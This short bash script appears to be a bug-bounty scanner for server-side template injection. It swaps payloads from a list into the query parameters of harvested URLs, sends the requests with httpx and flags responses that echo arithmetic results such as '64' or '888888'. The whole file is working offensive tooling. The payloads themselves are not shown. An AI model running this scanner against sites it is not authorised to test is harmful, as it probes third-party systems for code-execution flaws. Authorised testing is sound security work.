#!/bin/bash
#install uro qsreplace httpx anew
#./ssti url_endpoint.txt payload.txt http_domians.txt path_with_slash.txt

domain=$1
url=$2
onlyurl=$3
path=$4

cat $url |while read d;do cat $1|uro|grep '='| qsreplace $d|python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()));"|grep $d|anew>> ssti.txt;done

cat $url |while read d;do cat $1|uro|grep '='| qsreplace $d|anew>> ssti.txt;done

cat ssti.txt | httpx -mr 888888 -silent | tee -a ssti_vul88888.txt
cat ssti.txt | httpx -mr 64 -silent | tee -a ssti_vul64.txt
cat $3 | httpx -x GET,POST -mr '/64' -silent -path $4 | tee -a ssti_only_domain.com_64.txt
cat $3 | httpx -x GET,POST -mr '/888888' -silent -path $4 | tee -a ssti_only_domain.com_88888.txt
